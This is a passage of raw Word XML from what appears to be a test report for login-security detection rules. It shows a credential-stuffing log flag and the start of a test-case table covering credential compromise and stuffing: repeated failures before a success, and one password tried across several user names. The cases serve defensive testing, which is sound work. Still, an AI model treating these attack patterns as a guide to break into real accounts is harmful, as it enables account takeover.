              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log CREDENTIAL_STUFFING — MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">27</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for Credential Compromise and Stuffing</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="82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466"/>
        <w:gridCol w:w="1648"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="699"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2EBA6366" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case / Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attribute and value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1 successful login, no prior failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.23.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">COMPROMISE MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREDENTIAL_COMPROMISE MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4 failures then 1 successful login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.23.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">COMPROMISE HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREDENTIAL_COMPROMISE HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Password pass1234 with 2 user names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
